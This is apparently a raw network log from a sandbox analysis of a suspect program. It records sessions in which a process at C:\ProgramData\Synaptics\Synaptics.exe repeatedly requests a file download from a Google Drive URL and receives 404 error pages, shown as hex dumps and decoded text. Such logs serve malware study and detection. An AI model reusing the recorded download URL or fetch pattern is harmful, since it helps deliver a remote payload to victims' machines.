                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="naDg9NH/tvlbN7zYKrtLIA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:58 UTC655INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:58 UTC655INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        216192.168.2.349991142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:58 UTC652OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:58 UTC655INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:58 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-lAPHai5gEYPW8nQtv6/Rbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:58 UTC656INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:58 UTC656INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 47 62 49 45 4e 6d 30 57 31 51 31 6d 46 2f 73 73 58 5a 58 67 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tGbIENm0W1Q1mF/ssXZXgA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:58 UTC658INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:58 UTC658INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        217192.168.2.349992142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:58 UTC655OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:58 UTC658INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:58 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Dt8t1g08Fdh8VJIfLtGr5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:58 UTC659INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:58 UTC659INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 45 52 44 66 2f 63 57 45 61 68 6a 31 49 74 4c 6c 63 78 39 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7ERDf/cWEahj1ItLlcx94A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:58 UTC661INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:58 UTC661INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        218192.168.2.349993142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:58 UTC658OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        219192.168.2.349995142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:58 UTC661OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:58 UTC661INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:58 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Sw2giUHQ8EZfUFwIV64LMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:58 UTC663INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2f 39 47 79 74 36 6f 69 4d 72 75 44 44 59 72 58 55 6b 4a 41 61 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/9Gyt6oiMruDDYrXUkJAag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:58 UTC664INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:58 UTC664INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        22192.168.2.349760142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:31 UTC65OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:32 UTC69INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:32 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-mYWaxGH0y9wpAv4K6f4YyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:32 UTC70INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 32 67 4f 56 2b 77 46 52 41 32 2b 4c 39 61 59 62 72 67 72 2b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="p2gOV+wFRA2+L9aYbrgr+g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:32 UTC72INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:32 UTC72INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        220192.168.2.349997142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:58 UTC661OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:58 UTC664INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:58 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-p4/gYSyZZFB6V0oqeqAAkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:58 UTC666INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:58 UTC666INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 6f 37 37 49 37 62 4e 57 4d 38 2f 65 71 6f 7a 2f 2b 79 67 74 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uo77I7bNWM8/eqoz/+ygtQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
